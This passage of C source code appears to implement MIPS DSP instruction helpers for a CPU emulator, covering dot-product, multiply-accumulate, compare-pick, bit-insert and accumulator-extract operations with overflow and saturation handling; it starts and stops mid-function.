rt1); \ tempA = mipsdsp_mul_u16_u16(rs0, rt0); \ } \ \ temp[0] = (int64_t)tempD + (int64_t)tempC + \ (int64_t)tempB + (int64_t)tempA; \ \ if (temp[0] >= 0) { \ temp[1] = 0; \ } else { \ temp[1] = ~0ull; \ } \ \ acc[1] = env->active_tc.HI[ac]; \ acc[0] = env->active_tc.LO[ac]; \ \ if (is_add) { \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] = acc[1] + 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] + temp[1]; \ } else { \ temp_sum = acc[0] - temp[0]; \ if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ acc[1] = acc[1] - 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] - temp[1]; \ } \ \ env->active_tc.HI[ac] = temp[1]; \ env->active_tc.LO[ac] = temp[0]; \ } DP_QH(dpa_w_qh, 1, 0); DP_QH(dpaq_s_w_qh, 1, 1); DP_QH(dps_w_qh, 0, 0); DP_QH(dpsq_s_w_qh, 0, 1); #undef DP_QH #endif #define DP_L_W(name, is_add) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int32_t temp63; \ int64_t dotp, acc; \ uint64_t temp; \ bool overflow; \ \ dotp = mipsdsp_mul_q31_q31(ac, rs, rt, env); \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ if (is_add) { \ temp = acc + dotp; \ overflow = MIPSDSP_OVERFLOW_ADD((uint64_t)acc, (uint64_t)dotp, \ temp, (0x01ull << 63)); \ } else { \ temp = acc - dotp; \ overflow = MIPSDSP_OVERFLOW_SUB((uint64_t)acc, (uint64_t)dotp, \ temp, (0x01ull << 63)); \ } \ \ if (overflow) { \ temp63 = (temp >> 63) & 0x01; \ if (temp63 == 1) { \ temp = (0x01ull << 63) - 1; \ } else { \ temp = 0x01ull << 63; \ } \ \ set_DSPControl_overflow_flag(1, 16 + ac, env); \ } \ \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((temp & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t) \ (temp & MIPSDSP_LLO); \ } DP_L_W(dpaq_sa_l_w, 1); DP_L_W(dpsq_sa_l_w, 0); #undef DP_L_W #if defined(TARGET_MIPS64) #define DP_L_PW(name, func) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs1, rs0; \ int32_t rt1, rt0; \ int64_t tempB[2], tempA[2]; \ int64_t temp[2]; \ int64_t acc[2]; \ int64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); \ tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); \ \ if (tempB[0] >= 0) { \ tempB[1] = 0x00; \ } else { \ tempB[1] = ~0ull; \ } \ \ if (tempA[0] >= 0) { \ tempA[1] = 0x00; \ } else { \ tempA[1] = ~0ull; \ } \ \ temp_sum = tempB[0] + tempA[0]; \ if (((uint64_t)temp_sum < (uint64_t)tempB[0]) && \ ((uint64_t)temp_sum < (uint64_t)tempA[0])) { \ temp[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] += tempB[1] + tempA[1]; \ \ mipsdsp_##func(acc, ac, temp, env); \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } DP_L_PW(dpaq_sa_l_pw, sat64_acc_add_q63); DP_L_PW(dpsq_sa_l_pw, sat64_acc_sub_q63); #undef DP_L_PW void helper_mulsaq_s_l_pw(target_ulong rs, target_ulong rt, uint32_t ac, CPUMIPSState *env) { int32_t rs1, rs0; int32_t rt1, rt0; int64_t tempB[2], tempA[2]; int64_t temp[2]; int64_t acc[2]; int64_t temp_sum; rs1 = (rs >> 32) & MIPSDSP_LLO; rs0 = rs & MIPSDSP_LLO; rt1 = (rt >> 32) & MIPSDSP_LLO; rt0 = rt & MIPSDSP_LLO; tempB[0] = mipsdsp_mul_q31_q31(ac, rs1, rt1, env); tempA[0] = mipsdsp_mul_q31_q31(ac, rs0, rt0, env); if (tempB[0] >= 0) { tempB[1] = 0x00; } else { tempB[1] = ~0ull; } if (tempA[0] >= 0) { tempA[1] = 0x00; } else { tempA[1] = ~0ull; } acc[0] = env->active_tc.LO[ac]; acc[1] = env->active_tc.HI[ac]; temp_sum = tempB[0] - tempA[0]; if ((uint64_t)temp_sum > (uint64_t)tempB[0]) { tempB[1] -= 1; } temp[0] = temp_sum; temp[1] = tempB[1] - tempA[1]; if ((temp[1] & 0x01) == 0) { temp[1] = 0x00; } else { temp[1] = ~0ull; } temp_sum = acc[0] + temp[0]; if (((uint64_t)temp_sum < (uint64_t)acc[0]) && ((uint64_t)temp_sum < (uint64_t)temp[0])) { acc[1] += 1; } acc[0] = temp_sum; acc[1] += temp[1]; env->active_tc.HI[ac] = acc[1]; env->active_tc.LO[ac] = acc[0]; } #endif #define MAQ_S_W(name, mov) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rth; \ int32_t tempA; \ int64_t tempL, acc; \ \ rsh = (rs >> mov) & MIPSDSP_LO; \ rth = (rt >> mov) & MIPSDSP_LO; \ tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ acc = ((uint64_t)env->active_tc.HI[ac] << 32) | \ ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); \ tempL = (int64_t)tempA + acc; \ env->active_tc.HI[ac] = (target_long)(int32_t) \ ((tempL & MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t) \ (tempL & MIPSDSP_LLO); \ } MAQ_S_W(maq_s_w_phl, 16); MAQ_S_W(maq_s_w_phr, 0); #undef MAQ_S_W #define MAQ_SA_W(name, mov) \ void helper_##name(uint32_t ac, target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int16_t rsh, rth; \ int32_t tempA; \ \ rsh = (rs >> mov) & MIPSDSP_LO; \ rth = (rt >> mov) & MIPSDSP_LO; \ tempA = mipsdsp_mul_q15_q15(ac, rsh, rth, env); \ tempA = mipsdsp_sat32_acc_q31(ac, tempA, env); \ \ env->active_tc.HI[ac] = (target_long)(int32_t)(((int64_t)tempA & \ MIPSDSP_LHI) >> 32); \ env->active_tc.LO[ac] = (target_long)(int32_t)((int64_t)tempA & \ MIPSDSP_LLO); \ } MAQ_SA_W(maq_sa_w_phl, 16); MAQ_SA_W(maq_sa_w_phr, 0); #undef MAQ_SA_W #define MULQ_W(name, addvar) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int32_t rs_t, rt_t; \ int32_t tempI; \ int64_t tempL; \ \ rs_t = rs & MIPSDSP_LLO; \ rt_t = rt & MIPSDSP_LLO; \ \ if ((rs_t == 0x80000000) && (rt_t == 0x80000000)) { \ tempL = 0x7FFFFFFF00000000ull; \ set_DSPControl_overflow_flag(1, 21, env); \ } else { \ tempL = ((int64_t)rs_t * (int64_t)rt_t) << 1; \ tempL += addvar; \ } \ tempI = (tempL & MIPSDSP_LHI) >> 32; \ \ return (target_long)(int32_t)tempI; \ } MULQ_W(mulq_s_w, 0); MULQ_W(mulq_rs_w, 0x80000000ull); #undef MULQ_W #if defined(TARGET_MIPS64) #define MAQ_S_W_QH(name, mov) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int16_t rs_t, rt_t; \ int32_t temp_mul; \ int64_t temp[2]; \ int64_t acc[2]; \ int64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ rs_t = (rs >> mov) & MIPSDSP_LO; \ rt_t = (rt >> mov) & MIPSDSP_LO; \ temp_mul = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ \ temp[0] = (int64_t)temp_mul; \ if (temp[0] >= 0) { \ temp[1] = 0x00; \ } else { \ temp[1] = ~0ull; \ } \ \ acc[0] = env->active_tc.LO[ac]; \ acc[1] = env->active_tc.HI[ac]; \ \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ acc[0] = temp_sum; \ acc[1] += temp[1]; \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } MAQ_S_W_QH(maq_s_w_qhll, 48); MAQ_S_W_QH(maq_s_w_qhlr, 32); MAQ_S_W_QH(maq_s_w_qhrl, 16); MAQ_S_W_QH(maq_s_w_qhrr, 0); #undef MAQ_S_W_QH #define MAQ_SA_W(name, mov) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int16_t rs_t, rt_t; \ int32_t temp; \ int64_t acc[2]; \ \ rs_t = (rs >> mov) & MIPSDSP_LO; \ rt_t = (rt >> mov) & MIPSDSP_LO; \ temp = mipsdsp_mul_q15_q15(ac, rs_t, rt_t, env); \ temp = mipsdsp_sat32_acc_q31(ac, temp, env); \ \ acc[0] = (int64_t)(int32_t)temp; \ if (acc[0] >= 0) { \ acc[1] = 0x00; \ } else { \ acc[1] = ~0ull; \ } \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } MAQ_SA_W(maq_sa_w_qhll, 48); MAQ_SA_W(maq_sa_w_qhlr, 32); MAQ_SA_W(maq_sa_w_qhrl, 16); MAQ_SA_W(maq_sa_w_qhrr, 0); #undef MAQ_SA_W #define MAQ_S_L_PW(name, mov) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs_t, rt_t; \ int64_t temp[2]; \ int64_t acc[2]; \ int64_t temp_sum; \ \ temp[0] = 0; \ temp[1] = 0; \ \ rs_t = (rs >> mov) & MIPSDSP_LLO; \ rt_t = (rt >> mov) & MIPSDSP_LLO; \ \ temp[0] = mipsdsp_mul_q31_q31(ac, rs_t, rt_t, env); \ if (temp[0] >= 0) { \ temp[1] = 0x00; \ } else { \ temp[1] = ~0ull; \ } \ \ acc[0] = env->active_tc.LO[ac]; \ acc[1] = env->active_tc.HI[ac]; \ \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ acc[0] = temp_sum; \ acc[1] += temp[1]; \ \ env->active_tc.HI[ac] = acc[1]; \ env->active_tc.LO[ac] = acc[0]; \ } MAQ_S_L_PW(maq_s_l_pwl, 32); MAQ_S_L_PW(maq_s_l_pwr, 0); #undef MAQ_S_L_PW #define DM_OPERATE(name, func, is_add, sigext) \ void helper_##name(target_ulong rs, target_ulong rt, uint32_t ac, \ CPUMIPSState *env) \ { \ int32_t rs1, rs0; \ int32_t rt1, rt0; \ int64_t tempBL[2], tempAL[2]; \ int64_t acc[2]; \ int64_t temp[2]; \ int64_t temp_sum; \ \ temp[0] = 0x00; \ temp[1] = 0x00; \ \ MIPSDSP_SPLIT64_32(rs, rs1, rs0); \ MIPSDSP_SPLIT64_32(rt, rt1, rt0); \ \ if (sigext) { \ tempBL[0] = (int64_t)mipsdsp_##func(rs1, rt1); \ tempAL[0] = (int64_t)mipsdsp_##func(rs0, rt0); \ \ if (tempBL[0] >= 0) { \ tempBL[1] = 0x0; \ } else { \ tempBL[1] = ~0ull; \ } \ \ if (tempAL[0] >= 0) { \ tempAL[1] = 0x0; \ } else { \ tempAL[1] = ~0ull; \ } \ } else { \ tempBL[0] = mipsdsp_##func(rs1, rt1); \ tempAL[0] = mipsdsp_##func(rs0, rt0); \ tempBL[1] = 0; \ tempAL[1] = 0; \ } \ \ acc[1] = env->active_tc.HI[ac]; \ acc[0] = env->active_tc.LO[ac]; \ \ temp_sum = tempBL[0] + tempAL[0]; \ if (((uint64_t)temp_sum < (uint64_t)tempBL[0]) && \ ((uint64_t)temp_sum < (uint64_t)tempAL[0])) { \ temp[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] += tempBL[1] + tempAL[1]; \ \ if (is_add) { \ temp_sum = acc[0] + temp[0]; \ if (((uint64_t)temp_sum < (uint64_t)acc[0]) && \ ((uint64_t)temp_sum < (uint64_t)temp[0])) { \ acc[1] += 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] + temp[1]; \ } else { \ temp_sum = acc[0] - temp[0]; \ if ((uint64_t)temp_sum > (uint64_t)acc[0]) { \ acc[1] -= 1; \ } \ temp[0] = temp_sum; \ temp[1] = acc[1] - temp[1]; \ } \ \ env->active_tc.HI[ac] = temp[1]; \ env->active_tc.LO[ac] = temp[0]; \ } DM_OPERATE(dmadd, mul_i32_i32, 1, 1); DM_OPERATE(dmaddu, mul_u32_u32, 1, 0); DM_OPERATE(dmsub, mul_i32_i32, 0, 1); DM_OPERATE(dmsubu, mul_u32_u32, 0, 0); #undef DM_OPERATE #endif /** DSP Bit/Manipulation Sub-class insns **/ target_ulong helper_bitrev(target_ulong rt) { int32_t temp; uint32_t rd; int i; temp = rt & MIPSDSP_LO; rd = 0; for (i = 0; i < 16; i++) { rd = (rd << 1) | (temp & 1); temp = temp >> 1; } return (target_ulong)rd; } #define BIT_INSV(name, posfilter, ret_type) \ target_ulong helper_##name(CPUMIPSState *env, target_ulong rs, \ target_ulong rt) \ { \ uint32_t pos, size, msb, lsb; \ uint32_t const sizefilter = 0x3F; \ target_ulong temp; \ target_ulong dspc; \ \ dspc = env->active_tc.DSPControl; \ \ pos = dspc & posfilter; \ size = (dspc >> 7) & sizefilter; \ \ msb = pos + size - 1; \ lsb = pos; \ \ if (lsb > msb || (msb > TARGET_LONG_BITS)) { \ return rt; \ } \ \ temp = deposit64(rt, pos, size, rs); \ \ return (target_long)(ret_type)temp; \ } BIT_INSV(insv, 0x1F, int32_t); #ifdef TARGET_MIPS64 BIT_INSV(dinsv, 0x7F, target_long); #endif #undef BIT_INSV /** DSP Compare-Pick Sub-class insns **/ #define CMP_HAS_RET(name, func, split_num, filter, bit_size) \ target_ulong helper_##name(target_ulong rs, target_ulong rt) \ { \ uint32_t rs_t, rt_t; \ uint8_t cc; \ uint32_t temp = 0; \ int i; \ \ for (i = 0; i < split_num; i++) { \ rs_t = (rs >> (bit_size * i)) & filter; \ rt_t = (rt >> (bit_size * i)) & filter; \ cc = mipsdsp_##func(rs_t, rt_t); \ temp |= cc << i; \ } \ \ return (target_ulong)temp; \ } CMP_HAS_RET(cmpgu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); #ifdef TARGET_MIPS64 CMP_HAS_RET(cmpgu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); CMP_HAS_RET(cmpgu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); #endif #undef CMP_HAS_RET #define CMP_NO_RET(name, func, split_num, filter, bit_size) \ void helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int##bit_size##_t rs_t, rt_t; \ int##bit_size##_t flag = 0; \ int##bit_size##_t cc; \ int i; \ \ for (i = 0; i < split_num; i++) { \ rs_t = (rs >> (bit_size * i)) & filter; \ rt_t = (rt >> (bit_size * i)) & filter; \ \ cc = mipsdsp_##func((int32_t)rs_t, (int32_t)rt_t); \ flag |= cc << i; \ } \ \ set_DSPControl_24(flag, split_num, env); \ } CMP_NO_RET(cmpu_eq_qb, cmpu_eq, 4, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_lt_qb, cmpu_lt, 4, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_le_qb, cmpu_le, 4, MIPSDSP_Q0, 8); CMP_NO_RET(cmp_eq_ph, cmp_eq, 2, MIPSDSP_LO, 16); CMP_NO_RET(cmp_lt_ph, cmp_lt, 2, MIPSDSP_LO, 16); CMP_NO_RET(cmp_le_ph, cmp_le, 2, MIPSDSP_LO, 16); #ifdef TARGET_MIPS64 CMP_NO_RET(cmpu_eq_ob, cmpu_eq, 8, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_lt_ob, cmpu_lt, 8, MIPSDSP_Q0, 8); CMP_NO_RET(cmpu_le_ob, cmpu_le, 8, MIPSDSP_Q0, 8); CMP_NO_RET(cmp_eq_qh, cmp_eq, 4, MIPSDSP_LO, 16); CMP_NO_RET(cmp_lt_qh, cmp_lt, 4, MIPSDSP_LO, 16); CMP_NO_RET(cmp_le_qh, cmp_le, 4, MIPSDSP_LO, 16); CMP_NO_RET(cmp_eq_pw, cmp_eq, 2, MIPSDSP_LLO, 32); CMP_NO_RET(cmp_lt_pw, cmp_lt, 2, MIPSDSP_LLO, 32); CMP_NO_RET(cmp_le_pw, cmp_le, 2, MIPSDSP_LLO, 32); #endif #undef CMP_NO_RET #if defined(TARGET_MIPS64) #define CMPGDU_OB(name) \ target_ulong helper_cmpgdu_##name##_ob(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ int i; \ uint8_t rs_t, rt_t; \ uint32_t cond; \ \ cond = 0; \ \ for (i = 0; i < 8; i++) { \ rs_t = (rs >> (8 * i)) & MIPSDSP_Q0; \ rt_t = (rt >> (8 * i)) & MIPSDSP_Q0; \ \ if (mipsdsp_cmpu_##name(rs_t, rt_t)) { \ cond |= 0x01 << i; \ } \ } \ \ set_DSPControl_24(cond, 8, env); \ \ return (uint64_t)cond; \ } CMPGDU_OB(eq) CMPGDU_OB(lt) CMPGDU_OB(le) #undef CMPGDU_OB #endif #define PICK_INSN(name, split_num, filter, bit_size, ret32bit) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ uint32_t rs_t, rt_t; \ uint32_t cc; \ target_ulong dsp; \ int i; \ target_ulong result = 0; \ \ dsp = env->active_tc.DSPControl; \ for (i = 0; i < split_num; i++) { \ rs_t = (rs >> (bit_size * i)) & filter; \ rt_t = (rt >> (bit_size * i)) & filter; \ cc = (dsp >> (24 + i)) & 0x01; \ cc = cc == 1 ? rs_t : rt_t; \ \ result |= (target_ulong)cc << (bit_size * i); \ } \ \ if (ret32bit) { \ result = (target_long)(int32_t)(result & MIPSDSP_LLO); \ } \ \ return result; \ } PICK_INSN(pick_qb, 4, MIPSDSP_Q0, 8, 1); PICK_INSN(pick_ph, 2, MIPSDSP_LO, 16, 1); #ifdef TARGET_MIPS64 PICK_INSN(pick_ob, 8, MIPSDSP_Q0, 8, 0); PICK_INSN(pick_qh, 4, MIPSDSP_LO, 16, 0); PICK_INSN(pick_pw, 2, MIPSDSP_LLO, 32, 0); #endif #undef PICK_INSN target_ulong helper_packrl_ph(target_ulong rs, target_ulong rt) { uint32_t rsl, rth; rsl = rs & MIPSDSP_LO; rth = (rt & MIPSDSP_HI) >> 16; return (target_long)(int32_t)((rsl << 16) | rth); } #if defined(TARGET_MIPS64) target_ulong helper_packrl_pw(target_ulong rs, target_ulong rt) { uint32_t rs0, rt1; rs0 = rs & MIPSDSP_LLO; rt1 = (rt >> 32) & MIPSDSP_LLO; return ((uint64_t)rs0 << 32) | (uint64_t)rt1; } #endif /** DSP Accumulator and DSPControl Access Sub-class insns **/ target_ulong helper_extr_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int32_t tempI; int64_t tempDL[2]; shift = shift & 0x1F; mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } tempI = (tempDL[0] >> 1) & MIPSDSP_LLO; tempDL[0] += 1; if (tempDL[0] == 0) { tempDL[1] += 1; } if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } return (target_long)tempI; } target_ulong helper_extr_r_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int64_t tempDL[2]; shift = shift & 0x1F; mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } tempDL[0] += 1; if (tempDL[0] == 0) { tempDL[1] += 1; } if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } return (target_long)(int32_t)(tempDL[0] >> 1); } target_ulong helper_extr_rs_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int32_t tempI, temp64; int64_t tempDL[2]; shift = shift & 0x1F; mipsdsp_rndrashift_short_acc(tempDL, ac, shift, env); if ((tempDL[1] != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && (tempDL[1] != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { set_DSPControl_overflow_flag(1, 23, env); } tempDL[0] += 1; if (tempDL[0] == 0) { tempDL[1] += 1; } tempI = tempDL[0] >> 1; if (((tempDL[1] & 0x01) != 0 || (tempDL[0] & MIPSDSP_LHI) != 0) && ((tempDL[1] & 0x01) != 1 || (tempDL[0] & MIPSDSP_LHI) != MIPSDSP_LHI)) { temp64 = tempDL[1] & 0x01; if (temp64 == 0) { tempI = 0x7FFFFFFF; } else { tempI = 0x80000000; } set_DSPControl_overflow_flag(1, 23, env); } return (target_long)tempI; } #if defined(TARGET_MIPS64) target_ulong helper_dextr_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); return (int64_t)(int32_t)(temp[0] >> 1); } target_ulong helper_dextr_r_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { set_DSPControl_overflow_flag(1, 23, env); } return (int64_t)(int32_t)(temp[0] >> 1); } target_ulong helper_dextr_rs_w(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { if (temp128 == 0) { temp[0] = 0x0FFFFFFFF; } else { temp[0] = 0x0100000000ULL; } set_DSPControl_overflow_flag(1, 23, env); } return (int64_t)(int32_t)(temp[0] >> 1); } target_ulong helper_dextr_l(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; target_ulong ret; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); ret = (temp[1] << 63) | (temp[0] >> 1); return ret; } target_ulong helper_dextr_r_l(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; target_ulong ret; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { set_DSPControl_overflow_flag(1, 23, env); } ret = (temp[1] << 63) | (temp[0] >> 1); return ret; } target_ulong helper_dextr_rs_l(target_ulong ac, target_ulong shift, CPUMIPSState *env) { uint64_t temp[3]; uint32_t temp128; target_ulong ret; shift = shift & 0x3F; mipsdsp_rndrashift_acc(temp, ac, shift, env); temp[0] += 1; if (temp[0] == 0) { temp[1] += 1; if (temp[1] == 0) { temp[2] += 1; } } temp128 = temp[2] & 0x01; if ((temp128 != 0 || temp[1] != 0) && (temp128 != 1 || temp[1] != ~0ull)) { if (temp128 == 0) { temp[1] &= ~0x00ull - 1; temp[0] |= ~0x00ull - 1; } else { temp[1] |= 0x01; temp[0] &= 0x01; } set_DSPControl_overflow_flag(1, 23, env); } ret = (temp[1] << 63) | (temp[0] >> 1); return ret; } #endif target_ulong helper_extr_s_h(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int64_t temp, acc; shift = shift & 0x1F; acc = ((int64_t)env->active_tc.HI[ac] << 32) | ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); temp = acc >> shift; if (temp > (int64_t)0x7FFF) { temp = 0x00007FFF; set_DSPControl_overflow_flag(1, 23, env); } else if (temp < (int64_t)0xFFFFFFFFFFFF8000ULL) { temp = 0xFFFF8000; set_DSPControl_overflow_flag(1, 23, env); } return (target_long)(int32_t)(temp & 0xFFFFFFFF); } #if defined(TARGET_MIPS64) target_ulong helper_dextr_s_h(target_ulong ac, target_ulong shift, CPUMIPSState *env) { int64_t temp[2]; uint32_t temp127; shift = shift & 0x1F; mipsdsp_rashift_acc((uint64_t *)temp, ac, shift, env); temp127 = (temp[1] >> 63) & 0x01; if ((temp127 == 0) && (temp[1] > 0 || temp[0] > 32767)) { temp[0] &= 0xFFFF0000; temp[0] |= 0x00007FFF; set_DSPControl_overflow_flag(1, 23, env); } else if ((temp127 == 1) && (temp[1] < 0xFFFFFFFFFFFFFFFFll || temp[0] < 0xFFFFFFFFFFFF1000ll)) { temp[0] &= 0xFFFF0000; temp[0] |= 0x00008000; set_DSPControl_overflow_flag(1, 23, env); } return (int64_t)(int16_t)(temp[0] & MIPSDSP_LO); } #endif target_ulong helper_extp(target_ulong ac, target_ulong size, CPUMIPSState *env) { int32_t start_pos; int sub; uint32_t temp; uint64_t acc; size = size & 0x1F; temp = 0; start_pos = get_DSPControl_pos(env); sub = start_pos - (size + 1); if (sub >= -1) { acc = ((uint64_t)env->active_tc.HI[ac] << 32) | ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); temp = (acc >> (start_pos - size)) & (~0U >> (31 - size)); set_DSPControl_efi(0, env); } else { set_DSPControl_efi(1, env); } return (target_ulong)temp; } target_ulong helper_extpdp(target_ulong ac, target_ulong size, CPUMIPSState *env) { int32_t start_pos; int sub; uint32_t temp; uint64_t acc; size = size & 0x1F; temp = 0; start_pos = get_DSPControl_pos(env); sub = start_pos - (size + 1); if (sub >= -1) { acc = ((uint64_t)env->active_tc.HI[ac] << 32) | ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); temp = extract64(acc, start_pos - size, size + 1); set_DSPControl_pos(sub, env); set_DSPControl_efi(0, env); } else { set_DSPControl_efi(1, env); } return (target_ulong)temp; } #if defined(TARGET_MIPS64) target_ulong helper_dextp(target_ulong ac, target_ulong size, CPUMIPSState *env) { int start_pos; int len; int sub; uint64_t tempB, tempA; uint64_t temp; temp = 0; size = size & 0x3F; start_pos = get_DSPControl_pos(env); len = start_pos - size; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; sub = start_pos - (size + 1); if (sub >= -1) { temp = (tempB << (64 - len)) | (tempA >> len); temp = temp & ((1ULL << (size + 1)) - 1); set_DSPControl_efi(0, env); } else { set_DSPControl_efi(1, env); } return temp; } target_ulong helper_dextpdp(target_ulong ac, target_ulong size, CPUMIPSState *env) { int start_pos; int len; int sub; uint64_t tempB, tempA; uint64_t temp; temp = 0; size = size & 0x3F; start_pos = get_DSPControl_pos(env); len = start_pos - size; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; sub = start_pos - (size + 1); if (sub >= -1) { temp = (tempB << (64 - len)) | (tempA >> len); temp = temp & ((1ULL << (size + 1)) - 1); set_DSPControl_pos(sub, env); set_DSPControl_efi(0, env); } else { set_DSPControl_efi(1, env); } return temp; } #endif void helper_shilo(target_ulong ac, target_ulong rs, CPUMIPSState *env) { int8_t rs5_0; uint64_t temp, acc; rs5_0 = rs & 0x3F; rs5_0 = (int8_t)(rs5_0 << 2) >> 2; if (unlikely(rs5_0 == 0)) { return; } acc = (((uint64_t)env->active_tc.HI[ac] << 32) & MIPSDSP_LHI) | ((uint64_t)env->active_tc.LO[ac] & MIPSDSP_LLO); if (rs5_0 > 0) { temp = acc >> rs5_0; } else { temp = acc << -rs5_0; } env->active_tc.HI[ac] = (target_ulong)(int32_t)((temp & MIPSDSP_LHI) >> 32); env->active_tc.LO[ac] = (target_ulong)(int32_t)(temp & MIPSDSP_LLO); } #if defined(TARGET_MIPS64) void helper_dshilo(target_ulong shift, target_ulong ac, CPUMIPSState *env) { int8_t shift_t; uint64_t tempB, tempA; shift_t = (int8_t)(shift << 1) >> 1; tempB = 